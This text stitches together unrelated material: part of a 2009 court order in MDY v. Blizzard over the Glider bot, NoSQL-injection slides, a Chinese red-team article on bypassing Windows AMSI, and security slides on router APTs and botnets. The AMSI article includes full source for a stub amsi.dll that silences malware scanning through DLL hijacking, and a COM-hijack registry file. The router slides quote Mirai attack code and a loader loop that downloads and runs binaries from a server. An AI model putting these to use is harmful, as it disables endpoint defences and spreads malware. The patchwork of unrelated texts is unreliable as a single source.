Ariz. Contractors Ass’n, Inc. v. Candelaria, No. CV07-02496-PHX-NVW, 2008 WL 486002, at *1 (D. Ariz. Feb. 19, 2008) (citations omitted); see In re GTI Capital Holdings, LLC, No. 03-07923-SSC, 2008 WL 961112, at *6 (D. Ariz. Bankr. Apr. 4, 2008). MDY “carries a heavy burden to demonstrate that the stay is warranted.” McCammon v. United States, 584 F. Supp. 2d 193, 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 - 4 - 197 (D.D.C. 2008); see Winston-Salem/Forsyth County Bd. of Educ. v. Scott, 404 U.S. 1221, 1231 (1971) (Burger, C.J.). MDY must show either (1) “‘a probability of success on the merits and the possibility of irreparable injury’” or (2) “‘that serious legal questions are raised and that the balance of hardships tips sharply in its favor.’” Golden Gate Rest. Ass’n v. City & County of S.F., 512 F.3d 1112, 1115-16 (9th Cir. 2008) (citations omitted); see Stormans Inc. v. Selecky, 526 F.3d 406, 408 (9th Cir. 2008); Hilton v. Braunskill, 481 U.S. 770, 776 (1987). The Court must also consider whether a stay will harm Blizzard and whether the public interest supports the issuance of a stay. See id. A. Stay of the Copyright and DMCA Claims. 1. Likelihood of Success or Serious Questions Raised on Appeal. MDY and Donnelly assert that serious questions exist concerning the correctness of the Court’s ruling on the copyright and DMCA claims, and even attach draft articles and third-party commentary suggesting that the Court’s rulings are incorrect. Dkt. #111-3. The Court fully recognizes that these issues are debatable and that reasonable minds can disagree on whether the copyright and DMCA claims were decided correctly. See Dkt. #108 at 22. The Court has applied binding Ninth Circuit law on the scope of a license (Dkt. #82 at 6-12), whether purchasers of WoW software “own” the software for purposes of 17 U.S.C. § 117(a) (Dkt. #82 at 13-16), and whether copying to RAM constitutes “copying” for purposes of the Copyright Act (Dkt. #82 at 6 & n. 4). The Court recognizes that the Ninth Circuit may choose to reconsider its position on some or all of these issues during the appeal of this case. The Court therefore concludes that the appeal will raise serious questions concerning the copyright and DMCA claims. 2. Balance of Hardships. The Court must decide whether the balance of hardships tips sharply in favor of MDY and Donnelly. See Golden Gate Rest. Ass’n, 512 F.3d at 1115-16. The Court concludes that it does. Although Blizzard spends approximately $83,000 per month combating Glider and other bots, MDY and Donnelly note that Blizzard makes approximately $1,500,000 per month from WoW. The quantifiable injury to Blizzard from staying the injunction will thus 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 - 5 - amount to less than one-tenth of one percent of its monthly revenue. MDY and Donnelly, by contrast, would likely be put out of business by the permanent injunction. Even if the permanent injunction ultimately is eliminated on appeal, MDY and Donnelly likely will have lost all of their market share to competitors during the duration of the appeal and will be unable to regain their business. Given the serious questions to be raised on appeal by the copyright and DMCA claims, the Court concludes that the hardships to be suffered by MDY and Donnelly from a permanent injunction substantially outweigh the hardships to be suffered by Blizzard if the injunction is stayed pending appeal. See In re Hayes Microcomputer Prods., Inc. Patent Litig., 766 F. Supp. 818, 823 & n.4 (N.D. Cal. 1991) (balance of hardships favored stay of injunction where the defendants “could conceivably be put out of business before an appeal is even heard”). 3. Public Interest. As the Court previously has noted, public interest would seem to favor preservation of Blizzard’s copyright interests and termination of the exploitation of WoW by MDY and Donnelly. Dkt. #82 at 24-25. On the other hand, the Court of Appeals may change its position on pivotal legal issues in this case, resulting in a different outcome. Given that possibility, the public interest would seem to favor preservation of the status quo pending resolution of the appeal. The Court concludes that this factor slightly favors Blizzard, but is not sufficient to overcome the serious questions and balance of hardships that favor entry of a stay. The Court therefore concludes that the permanent injunction based on the copyright and DMCA violations should be stayed pending appeal. B. Tortious Interference. The law clearly provides that MDY and Donnelly may be enjoined from engaging in tortious interference. See Restatement (Second) of Torts § 766, cmt. u; Graham v. Mary Kay Inc., 25 W.W.3d 749, 755 (Tex. Ct. App. 2000) (“Injunctive relief is an appropriate remedy when a claim of tortious interference is involved.”); Adler, Barish, Daniels, Levin & Creskoff v. Epstein, 393 A.2d 1175, 436 n.21 (Pa. 1978) (“‘It is well settled that equity will act to prevent unjustified interference with contractual relations.’”) (citation omitted); Walt 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 - 6 - Peabody Advertising Serv. v. Pecora, 393 F. Supp. 328, 333 (W.D. Ky. 1975) (“[I]t has been held that the loss of a contractual customer to a third party who induces the breach of the contractual relationship constitutes injury for which injunctive relief shall issue.”); Special Purpose Accounts Receivable Cooperative Corp. v. Prime One Capital Co., 125 F. Supp. 2d 1093, 1106 (S.D. Fla. 2000) (injunctive relief appropriate if the plaintiffs established tortious interference otherwise “the plaintiff would be compelled to bring a claim against the defendants each time they interfere with [plaintiffs’] protected rights in the future”); see also Transgo, Inc. v. Ajac Transmission Parts Corp., 768 F.2d 1001, 1022 (9th Cir. 1985) (“‘An injunction may be framed to bar future violations that are likely to occur.’”) (citation and brackets omitted). MDY and Donnelly do not dispute that injunctive relief may be entered on the tortious interference claim, nor do they identify serious questions that will be raised by their tortious interference appeal. They argue instead that serious questions exist with respect to the copyright and DMCA claims and that “[w]ithout a copyright and DMCA violation, Blizzard could not meet the elements for tortious interference with contract.” Dkt. #111 at 5 n.14. The Court does not agree. To establish tortious interference, Blizzard was required to show that a valid contract exists between Blizzard and its customers, that MDY and Donnelly know of the contract, that MDY and Donnelly intentionally and improperly interfere with the contract thereby causing a breach, and that Blizzard is damaged as a result. See Dkt. #82 at 22 (citations omitted). MDY and Donnelly conceded most of these elements – that there is a valid contract between Blizzard and its customers, that they know of the contract, and that the use of Glider breaches the contract. Nor did MDY and Donnelly genuinely dispute that they intentionally interfere with the contract by promoting the use of Glider and that Blizzard is damaged as a result. Id. at 22-23. The key question, then, is whether MDY’s and Donnelly’s actions are improper as a matter of law. In concluding that they are, the Court did not rely on the fact that Glider includes copying of Blizzard’s software to RAM (copyright infringement) and circumvents Warden (DMCA violations). Rather, the Court found MDY and Donnelly’s conduct to be 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 - 7 - improper because (1) they profit from the sale of Glider knowing that its use constitutes a direct breach of Blizzard’s legitimate and substantial contract rights, (2) their interference causes Blizzard to lose customers and revenue, and (3) the use of Glider by WoW users upsets the carefully balanced competitive environment of WoW. Id. at 23-26; see Dkt. #108 at 15-16. Thus, even if MDY and Donnelly have raised serious questions regarding their copyright and DMCA liability, they have not identified such questions on their tortious interference liability. Nor have they made any effort to show that they are likely to succeed on the merits of their appeal of the tortious interference claim. Because MDY and Donnelly have not shown a probability of success on the merits or that their appeal will raise serious questions concerning the tortious interference claim, they cannot meet the requirements for a stay pending appeal. See Golden Gate Rest. Ass’n, 512 F.3d at 1115-16. The Court need not address the hardship or public interest aspects of the stay analysis. See In re Marrama, 345 B.R. 458, 473 (Bankr. D. Mass. 2006); see also First Brands Corp. v. Fred Meyer, Inc., 809 F.2d 1378, 1385 (9th Cir. 1987). C. Stay Summary and Injunction Bond. The Court concludes that MDY and Donnelly have established their right to a stay of the permanent injunction regarding the copyright and DMCA claims, but not the permanent injunction on the tortious interference claim. The Court recognizes that the separate treatment of these issues likely will have little practical effect. The permanent injunction on the tortious interference claim will foreclose MDY and Donnelly’s continued marketing, distribution, and support of Glider for use in WoW. For this reason, the Court concludes that Blizzard is not likely to be harmed by the stay of the copyright and DMCA injunction, and no bond is necessary. III. Bond for Stay of Damages. The parties stipulated to a $6,500,000 judgment against MDY and Donnelly on the tortious interference and copyright infringement claims. Dkt. ##112, 114. Pursuant to Rule 62(d), MDY and Donnelly may obtain a stay of that judgment pending appeal by posting a supersedeas bond. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 - 8 - A full bond generally is required under Rule 62(d) because the purpose of the bond “is to secure the appellees from a loss resulting from the stay of execution.” Rachel v. Banana Republic, Inc., 831 F.2d 1503, 1505 n.1 (9th Cir. 1987); see Nat’l Labor Relations Bd. v. Westphal, 859 F.2d 818, 819 (9th Cir. 1988). “‘In unusual circumstances, however, the district court in its discretion may order partially secured or unsecured stays if they do not unduly endanger the judgment creditor’s interest in ultimate recovery.’” Athridge v. Iglesias, 464 F. Supp. 2d 19, 23 (D.D.C. 2006) (quoting Fed. Prescription Serv., Inc. v. Am. Pharm. Ass’n, 636 F.2d 755, 760 (D.C. Cir. 1980)); see Townsend v. Holman Consulting Corp., 929 F.2d 1358, 1367 (9th Cir. 1991) (“[W]e have held that the district court may permit security other than a bond.”) (citing Int’l Telemeter v. Hamlin Int’l Co., 754 F.2d 1492, 1495 (9th Cir. 1985)). Where the “‘judgment debtor’s present financial condition is such that the posting of a full bond would impose an undue financial burden, the court is free to exercise its discretion to fashion some other arrangement for substitute security through an appropriate restraint on the judgment debtor’s financial dealings, which would equal protection to the judgment creditor.’” In re Wymer, 5 B.R. 802, 806 (B.A.P. 9th Cir. 1980) (citation and alteration omitted). MDY and Donnelly cannot post anything close to a full bond amount of $6,500,000 and therefore request an alternative form of security for the stay of the monetary judgment pending appeal. MDY and Donnelly propose that they be required to put all but the necessary funds to operate MDY for fixed overhead and salaries in an escrow account monthly and report both monthly income and expenses to Blizzard during the pendency of the appeal. Dkt. #111 at 8. Donnelly also testified at trial that while he has not set aside a separate reserve to satisfy the monetary judgment, he has not spent any profits from the sale of Glider since this litigation began. The Court concludes that an alternative form of security is appropriate. The appeal will raise serious questions concerning the copyright and DMCA claims and MDY and Donnelly have shown that their “‘financial condition is so impaired that [they] would have difficulty in securing a supersedeas bond.’” In re Wymer, 5 B.R. at 806 (citation omitted). 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 - 9 - The Court will require MDY and Donnelly to place all profits obtained from the sale of Glider or other operations of MDY, including all monies set aside by MDY and Donnelly since the commencement of this suit, in an escrow account approved by Blizzard. Such funds shall remain in escrow pending further order of the Court. MDY shall report its monthly income and expenses to Blizzard during the pendency of the appeal. Within 30 days after all appeals being exhausted, the parties shall file a joint status report regarding the appropriate disposition of the escrow funds. IT IS ORDERED: 1. Copyright and DMCA Permanent Injunction. Having found MDY Industries, LLC (“MDY”) and Michael Donnelly liable to Blizzard Entertainment, Inc. and Vivendi Games, Inc. (“Blizzard”) for contributory and vicarious copyright infringement and for violation of the Digital Millennium Copyright Act (“DMCA”), the Court permanently enjoins MDY and Michael Donnelly from engaging in contributory or vicarious copyright infringement and from violating the DMCA with respect to Blizzard’s copyrights in and rights to the World of Warcraft game (“WoW”). MDY and Donnelly are enjoined from (a) marketing, selling, supporting, distributing, or developing Glider for use in connection with WoW; (b) infringing, or contributing to the infringement of, Blizzard’s copyrights in WoW software; (c) circumventing, or contributing to the circumvention of, Blizzard’s protection mechanisms that control access to the dynamic, nonliteral elements of WoW, including but not limited to the circumvention of Warden; and (d) operating or supporting any server that authenticates copies of Glider for use in WoW or provides Glider with information about the memory addresses WoW uses to store its game state information. This permanent injunction shall apply with the same force and effect to any future release of the World of Warcraft Game Client in which Blizzard has a financial or other interest, which interest is known to MDY or Donnelly. The permanent injunction set forth in this paragraph shall be stayed pending appeal. 2. Tortious Interference Permanent Injunction. Having found MDY and Michael Donnelly liable to Blizzard for tortious interference with contract, the Court permanently 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 - 10 - enjoins MDY and Michael Donnelly from tortiously interfering with the End Use License Agreement (“EULA”) and Terms of Use Agreement (“TOU”) that Blizzard enters into with its WoW customers. MDY and Donnelly are enjoined from (a) marketing, selling, supporting, distributing, or developing Glider for use in connection with WoW; or (b) operating or supporting any server that authenticates copies of Glider for use in WoW or provides Glider with information about the memory addresses WoW uses to store its game state information. This permanent injunction shall apply with the same force and effect to any future release of the WoW Game Client in which Blizzard has a financial or other interest, which interest is known to MDY or Donnelly. This injunction shall remain in effect so long as Blizzard’s EULA and TOU clearly prohibit the use of Glider in WoW. 3. Bond Requirements for Stay of the Money Judgment. MDY and Michael Donnelly shall place all present and future profits obtained from the sale of Glider or other operations of MDY, including all monies set aside by MDY and Donnelly from the commencement of this suit, in an escrow account approved by Blizzard. Such funds shall remain in escrow pending further order of the Court. MDY shall report its monthly income and expenses to Blizzard during the pendency of the appeal. Within 30 days after all appeals being exhausted, the parties shall file a joint status report regarding the appropriate disposition of the escrow funds. 4. The Court shall retain jurisdiction to hold proceedings and to enter further orders as may be appropriate to implement or enforce the provisions of this Order and Permanent Injunction. DATED this 10th day of March, 2009.
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NoSQL, No Injection !? By. Kuon Agenda  What is NoSQL?  Types of NoSQL  Who use NoSQL concept?  NoSQL Architecture  Security Problem  Prevention and Detection !? What is NoSQL? χ No SQL (statement) χ No SQL Injection  Not only a SQL  Non-RDBMS • Semi-structured • Schema-less Types of NoSQL 1. Key-value based 2. Column-based 3. Document-based 4. Graph-based 5. Object-based 6. … Why NoSQL 1. Performance 2. Scalability Who use NoSQL concept? 1. Cloud Computing  (SaaS Security) 2. SNS 3. Portal Website  Mixed Databases NoSQL Architecture 1. Web Application & Web Service 2. Client Library  The key factor  Query-method 3. NoSQL Database NoSQL Vulnerabilities 1. Connection Pollution 2. JSON Injection 3. View Injection 4. Key Bruteforce NoSQL Vulnerabilities 1. Connection Pollution  RESTful  Cross-Database/-Pool Access  CouchDB’s Global and DB Handler Ex:  NoSQL.connect(“http://”.$Pool.”/HIT2010/”)  NoSQL.connect(“http://POOL/”.$Database) Document-based Problem (CouchDB) 2. JSON Injection(Data)  DRY(Don’t Repeat Yourself)  The weakness is String type • Using Collection type  escapeJSON()/unescapeJSON() • When handling tainted strings Document-based Problem (CouchDB) 3. View Injection(Application)  CouchDB's view is using SpiderMonkey as Scripting Engine  What is “View”? CouchApp   Predefined View and Temporary View  Evil Map/Reduce Key-Value based Problem 4. Key Bruteforce  Schema-free   How to make faster attacks?  Depends on implementation of client library & architecture  CHALLENGE:Can I make context-sensitive attack? http://IP/app/action?key=1aD33rSq Ex:  $value = NoSQL.Get($key) Key-Value based Problem 4. Key Bruteforce Prevention (Application-level)  Key Size  Key Space  Unpredictable Key Generation  Challenge-based NoSQL vs. WAS 1. Unknown Error Message  Logic-based Blind Injection when XQL is exist  Time-based Differential Attack? 2. Different Types of Attack Payload 1. Languages 2. Schema-less  Redefine Attack Surface (Entry Point Sensitive than RDBMS) 3. Different Concepts of Attack NoSQL vs. SCA 1. Checking by Data Flow,but Diversity  Unsupported Client Library NoSQL vs. WAF 1. Key Bruteforce is not Injection Attack  Block by Access Threshold 2. URL Integrity Check (ex: Add Token)  Transparency Ex: http://IP/app/action?key=1aD33rSq[HMAC($key)] http://IP/app/action?key=1aD33rSq&OTPtoken=sdfg23s0 THANK YOU Kuon@chroot.org
Bypass AMSI的前世今生(4) - 非主流合集 0x00 前言 分析完了[BA1-4],我相信大家对AMSI已经有了不错的认知,也能够利用混淆bypass AMSI了。今天我 们讨论的是非主流的bypass amsi的合集,也就是[BA5-8],分别如下: [BA5] 卸载当前进程中的amsi.dll [BA6] PowerShell.exe同目录下放入傀儡amsi.dll劫持正常amsi.dll(正常amsi.dll存在于 c:\windows\system32\amsi.dll) [BA7] Null字符绕过 [BA8] COM Server劫持(劫持杀软接入接口) 这些方法曾今都能起到bypass AMSI作用,但是很鸡肋。其中[BA5]实际测试的时候是不行的, powershell进程要崩溃,其它有的早已修复。 既然有非主流,那么主流手法有哪些呢?这里提一下,目前主流好用的手法为2种,第一种我们已经在 《Bypass AMSI的前世今生(3) - 脚本混淆和一行命令关闭AMSI》种提到的混淆+”一行命令“,另外一种就 是内存补丁,将在下一节讲到。 这一节我们先来测试一遍这4个非主流手法以及他的思路。 0x01 卸载当前进程中的amsi.dll 在前面的文章中,我们知道amsi其实是以dll形式存在的,powershell启动的时候,会加载amsi.dll,然 后调用其中的AmsiScanString或AmsiScanBuffer函数来进行检测(在部分老的win10系统中使用的是 AmsiScanString,较新的系统使用的是AmsiScanBuffer,大约分界线是1709)。 因此我们就有了对抗思路,我们能不能unload amsi.dll呢?这样amsi.dll不存在了,就不能检测到了。 答案是不行的,这样太暴力了,我们深入想,我们unload amsi.dll,powershell使用 AmsiOpenSession的时候,函数指针指向的位置不是真正的AmsiOpenSession代码,就会崩溃。我们 虽然unload了amsi.dll,但是我们的powershell进程也崩了,2败俱伤。我们使用process hacker工具来 测试下。 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-30 No. 1 / 7 - Welcome to www.red-team.cn 调用AmsiOpenSession的时候,直接就崩溃了,因此这种暴力unload的方法是不行的。既然unload不 行我们来看看劫持amsi.dll 0x02 劫持amsi.dll PowerShell.exe同目录下放入傀儡amsi.dll劫持正常amsi.dll(正常amsi.dll存在于 c:\windows\system32\amsi.dll),这个都不用过多解释,常规的dll劫持技术,由于研发人员使用 LoadLibrary函数导入dll的时候没有使用绝对路径,因此程序会首先在当前目录下寻找dll,因此我们在 powerShell.exe同目录下放一个amsi.dll做劫持。但是win7以上也可以修改注册表,强制加载system32 下的dll。具体的详情,可以阅读官方文档:https://docs.microsoft.com/en-us/windows/win32/dlls/d ynamic-link-library-search-order 劫持amsi.dll有2个问题: 怎么放置傀儡amsi.dll,也就是放置在哪个目录 amsi.dll要导出哪些函数,不导出amsi.dll本身的函数,会导致和unload一样的问题,使得 powershell不能工作了 解决第一个问题 我们通过process Monitor来观察下powershell.exe对amsi.dll的加载顺序。我们过滤powershell.exe进 程名来观察下: 我们来看看powershell先在如下目录去寻找amsi.dll,没有找到,然后再去system32目录下。 位置是找到了,我们来解决第二个问题。 C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0 .0.0__31bf3856ad364e35\ C:\Windows\System32\WindowsPowerShell\v1.0\ Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-30 No. 2 / 7 - Welcome to www.red-team.cn 解决第二个问题 第二个问题也是很好解决的,官方给了api文档,我们抄一抄就好了,但是呢,第一篇我们说过了,官方 文档也是不全的,文档比较老了,目前新的amsi增加了其他几个导出函数,抄起ida,按上F5,补一 下。我使用的是vs2019,创建一个动态链接库项目,然后创建下面2个文件: // amsi.h #pragma once #include "pch.h" LPCWSTR appName = NULL; typedef struct HAMSICONTEXT {    DWORD       Signature;          // "AMSI" or 0x49534D41    PWCHAR      AppName;           // set by AmsiInitialize    DWORD       Antimalware;       // set by AmsiInitialize    DWORD       SessionCount;      // increased by AmsiOpenSession } HAMSICONTEXT; typedef enum AMSI_RESULT {    AMSI_RESULT_CLEAN = 0x00,    AMSI_RESULT_NOT_DETECTED = 0x01,    AMSI_RESULT_BLOCKED_BY_ADMIN_START = 0x4000,    AMSI_RESULT_BLOCKED_BY_ADMIN_END = 0x4fff,    AMSI_RESULT_DETECTED = 0x8000, } AMSI_RESULT; typedef struct HAMSISESSION {    DWORD amsiSession; } HAMSISESSION; extern "C" __declspec(dllexport) void AmsiInitialize(LPCWSTR appName, HAMSICONTEXT* amsiContext); extern "C" __declspec(dllexport) void AmsiOpenSession(HAMSICONTEXT amsiContext, HAMSISESSION* amsiSession); extern "C" __declspec(dllexport) void AmsiCloseSession(HAMSICONTEXT amsiContext, HAMSISESSION amsiSession); extern "C" __declspec(dllexport) void AmsiScanBuffer(HAMSICONTEXT amsiContext, PVOID buffer, ULONG length, LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT* result); extern "C" __declspec(dllexport) void AmsiScanString(HAMSICONTEXT amsiContext, LPCWSTR string, LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT* result); extern "C" __declspec(dllexport) void AmsiUninitialize(HAMSICONTEXT amsiContext); extern "C" __declspec(dllexport) int AmsiUacInitialize(DWORD* a1); extern "C" __declspec(dllexport) int AmsiUacScan(int a1, int a2, AMSI_RESULT* result, DWORD* a4); extern "C" __declspec(dllexport) void** AmsiUacUninitialize(LPVOID pv); //amsi.cpp #include "pch.h" #include "amsi.h" #include "combaseapi.h" /* typedef struct HAMSICONTEXT {    DWORD       Signature;         // "AMSI" or 0x49534D41    PWCHAR     AppName;           // set by AmsiInitialize    DWORD       Antimalware;       // set by AmsiInitialize Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-30 No. 3 / 7 - Welcome to www.red-team.cn 编译好后,我们放入上面的目录试试: 起作用了,我们再测试另外一个目录,也是可以的。    DWORD       SessionCount;     // increased by AmsiOpenSession } HAMSICONTEXT; */ void AmsiInitialize(LPCWSTR appName, HAMSICONTEXT* amsiContext) { } void AmsiOpenSession(HAMSICONTEXT amsiContext, HAMSISESSION * amsiSession) { } void AmsiCloseSession(HAMSICONTEXT amsiContext, HAMSISESSION amsiSession) { } void AmsiScanBuffer(HAMSICONTEXT amsiContext, PVOID buffer, ULONG length, LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT * result) { } void AmsiScanString(HAMSICONTEXT amsiContext, LPCWSTR string, LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT * result) { } void AmsiUninitialize(HAMSICONTEXT amsiContext) { } int AmsiUacInitialize(DWORD* a1) {    return 0; } int AmsiUacScan(int a1, int a2, AMSI_RESULT* result, DWORD* a4) {    return 0; } void** AmsiUacUninitialize(LPVOID pv) {    return NULL; } Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-30 No. 4 / 7 - Welcome to www.red-team.cn 劫持方法,是可行,但是缺陷也很明显: 这2个目录都需要管理员权限,普通用户不行 当然你也可以把powershell.exe 和 amsi.dll(劫持)复制到一个普通权限用户使用 有一个落地DLL文件,这个dll文件需要考虑免杀问题 这种dll劫持技术,defender杀应该只是时间问题(表示我测试的时候似乎全程defender无感) 0x03 Null字符绕过 这个问题已经被微软修复了https://portal.msrc.microsoft.com/en-us/security-guidance/acknowledg ments,这个问题的作者也写了详细文章http://standa-note.blogspot.com/2018/02/amsi-bypass-wit h-null-character.html。我这儿就不班门弄斧了。只大致说下原理: 通过前面学习,我们知道扫描使用的是如下函数 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-30 No. 5 / 7 - Welcome to www.red-team.cn 其中string传入的就是我们的脚本,这个地方可以空字符截断(ps:空字符截断真是随处可见),然后我 们只需在我们恶意脚本开头加入空字符,就可以bypass了。 修复方法很有意思,就是用了另外一个函数: 前面我说过win10中途换了扫描函数,原来是这个原因。 0x04 COM Server劫持 这个也是被微软修复了的问题,具体文章可以阅读https://enigma0x3.net/2017/07/19/bypassing-amsi -via-com-server-hijacking/,我这儿也简单描述的原理。 amsi.dll在老版本中使用 CoCreateInstance()函数调用IID和CLSID来实例化COM接口。而这个函数会先 从注册表HKCU中找对应的DLL,也就是当前用户,因此我们创建相应的注册表,让它调用失败就行了 微软修复了这个问题,通过直接调用 amsi.dll 的 DllGetClassObject() 函数替换 CoCreateInstance(), 可以避免注册表解析。 上面原作者文章中,作者提出dll劫持bypass这个修复,原理就是0x02中介绍的,只是把我们自己编译的 amsi.dll换成微软的老amsi.dll这个dll可是微软自己签名的dll,不会被杀,然后再劫持注册表,就又可以 愉快玩耍了,但是这种方法也很容易被杀软检测,直接监控这个注册表的创建就行了。因此这个方法也 不是很常用。 但是说句题外话,COM相关的技术应用,在对抗杀软上有很大的空间。 HRESULT WINAPI AmsiScanString( _In_     HAMSICONTEXT amsiContext, _In_     LPCWSTR     string,   // Will be terminated at the first null character _In_     LPCWSTR     contentName, _In_opt_ HAMSISESSION session, _Out_   AMSI_RESULT *result ); HRESULT WINAPI AmsiScanBuffer( _In_     HAMSICONTEXT amsiContext, _In_     PVOID       buffer, // Not terminated at the null character _In_     ULONG       length, _In_     LPCWSTR     contentName, _In_opt_ HAMSISESSION session, _Out_   AMSI_RESULT *result ); Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba- 4357bb0072ec}] [HKEY_CURRENT_USER\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba- 4357bb0072ec}\InProcServer32] @="C:\\goawayamsi.dll" Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-30 No. 6 / 7 - Welcome to www.red-team.cn 0x05 总结 本文中这些非主流bypass,第一个不能用,第三、第四个已经被修复。只有第二个目前依旧还能工作。 之所以记录下这些已经不能利用的方法,主要是学习思路,0x03中的空字符、0x04中的注册表优先级, 都是可以记录的技巧。 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-30 No. 7 / 7 - Welcome to www.red-team.cn
cp / zet / f9a L A S T E X P L O I T A T I O N About Us ● Researchers from TeamT5 ● Core Developer of ThreatSonar for Linux, macOS, Windows ● We mainly focus on state of the art techniques of threat actors and how to effectively identify them 3 Outline 4 Attack Defense Tool ● LEAYA: an Embedded System Detection and Response ● APT and Botnet Case Studies ● Post-Exploitation Techniques ● Identifying Threats ● SOHO Router Vendors Security Solution APT and Botnet Case Studies 5 BlackTech ● Use VPN & DDNS & Virutal Host as C2 server ● Use man-in-the-middle attack subnetwork endpoint 6 APT https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/ Router Compromise Attater Router Tartget PC 7 APT Compromise https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/ Update Interception Update Server Malicious File Malicious Update 8 APT Update request Interception User https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/ Payload Delivery Malicious Update File Compromise 9 APT https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/ Malicious Update Router Slingshot ● Compromised Mikrotik router ● Downloads and loads malicious DLLs when use Winbox connect to router 10 Winbox User Winbox Mikrotik Router Slingshot 11 APT https://www.kaspersky.com/about/press-releases/2018_slingshot User Winbox Mikrotik Router Slingshot 12 APT https://www.kaspersky.com/about/press-releases/2018_slingshot User Winbox Mikrotik Router Slingshot 13 APT https://www.kaspersky.com/about/press-releases/2018_slingshot User Winbox Mikrotik Router Slingshot 14 APT https://www.kaspersky.com/about/press-releases/2018_slingshot Fancy Bear & VPNFilter (APT28) ● VPNFilter use default Cert or 1day to exploit device ● Infecting 500k devices. ● Modules ○ htpx: Http Sniffer ○ ndbr: SSH utility ○ nm: arp/wireless scan ○ netfilter: DoS utility ○ portforwarding ○ socks5proxy ○ tcpvpn: reverse-tcp vpn 15 APT https://blog.talosintelligence.com/2018/05/VPNFilter.html 16 https://blog.talosintelligence.com/2018/05/VPNFilter.html 17 https://blog.talosintelligence.com/2018/05/VPNFilter.html VPNFilter Stage 1 ● After exploited router ○ Comproising NVRAM to add itself to crontab in NVRAM ○ Stage 1 will autorun after router reboot 18 APT Stage 1 crontab NVRAM VPNFilter Stage 1 ● After exploited router ○ Comproising NVRAM to add itself to crontab in NVRAM ○ Stage 1 will autorun after router reboot 19 APT Stage 1 crontab NVRAM Stage 2 C2 20 Mirai ● Worm Propagation ● Target: IoT Devices ● Use default username and password ● DDoS ● Open Source ○ Easy to create variants of Miria ■ miori ■ Omni ■ Satori ■ TheMoon 21 Botnet 22 https://github.com/jgamblin/Mirai-Source-Code BOOL attack_init(void) { int i; add_attack(ATK_VEC_UDP, (ATTACK_FUNC)attack_udp_generic); add_attack(ATK_VEC_VSE, (ATTACK_FUNC)attack_udp_vse); add_attack(ATK_VEC_DNS, (ATTACK_FUNC)attack_udp_dns); add_attack(ATK_VEC_UDP_PLAIN, (ATTACK_FUNC)attack_udp_plain); add_attack(ATK_VEC_SYN, (ATTACK_FUNC)attack_tcp_syn); add_attack(ATK_VEC_ACK, (ATTACK_FUNC)attack_tcp_ack); add_attack(ATK_VEC_STOMP, (ATTACK_FUNC)attack_tcp_stomp); add_attack(ATK_VEC_GREIP, (ATTACK_FUNC)attack_gre_ip); add_attack(ATK_VEC_GREETH, (ATTACK_FUNC)attack_gre_eth); //add_attack(ATK_VEC_PROXY, (ATTACK_FUNC)attack_app_proxy); add_attack(ATK_VEC_HTTP, (ATTACK_FUNC)attack_app_http); return TRUE; } 23 binarys = "mips mpsl arm arm5 arm6 arm7 sh4 ppc x86 arc" server_ip = "$SERVER_IP" binname = "miori" execname = "$EXECNAME" for arch in $binarys do cd /tmp wget http://$server_ip/$binname.$arch - O $execname chmod 777 $execname ./$execname Think.PHP rm -rf $execname done Default Username / Password 24 Default Username / Password CVE-2018-20062 Default Username / Password CVE-2018-20062 CVE-2018-20062 LiquorBot ● Base on Mirai ● Worm Propagation ● 82 Default username / password ● Use 12 router exploits ○ Weblogic, WordPress, Drupal ● XMR Miner 25 Botnet https://labs.bitdefender.com/2020/01/hold-my-beer-mirai-spinoff-named-liquorbot-incorporates-cryptomining/ Cereals ● Worm Propagation ● D-Link NVRs and NAS ● 1 Exploit: CVE-2014-2691 ● Install Services ○ VPN (Tinc) ○ HTTP proxy (Polipo) ○ Socks proxy (Nylon) ○ SSH daemon (Dropbear) ○ new root / remote user ● Goal: Download Anime 26 Botnet https://www.forcepoint.com/blog/x-labs/botnets-nas-nvr-devices Post-Exploitation Techniques Understanding Threats APT ● Persistence ● Weak password ● Hardcoded SSH ● Service(ssh, telnet, ddns, vpn client, ddns , proxy) ● C&C Common ● DNS Hijacking ● Reverse Shell ● Reverse-TCP VPN ● Port Forwarding ● Sniffer ● DoS ● Compromised DLL Botnet ● Worm ● DDoS ● Coin Miner 28 Network ● HTTP Proxy ● SOCKS ● Port Forwarding ● Reverse Shell ● Reverse-TCP VPN Control ● Weak password ● Hardcoded SSH ● SSH ● TELNET ● DDNS ● VPN ● Sniffer Intention ● C&C ● Worm ● DDoS ● Coin Miner ● DNS Hijacking ● Fake Binary 29 30 Conclusion of Attack Router Interface Web UPNP Telnet Manage service XSS CMD injection Buffer Overflow Weak password NVRAM cgi binary (root privileges) 31 Identify Threats Forensic Evidences ● Process ○ Memory ○ Environment ● File ○ /etc/shadow ○ Hardcoded password ○ Autoruns (crontab) ○ 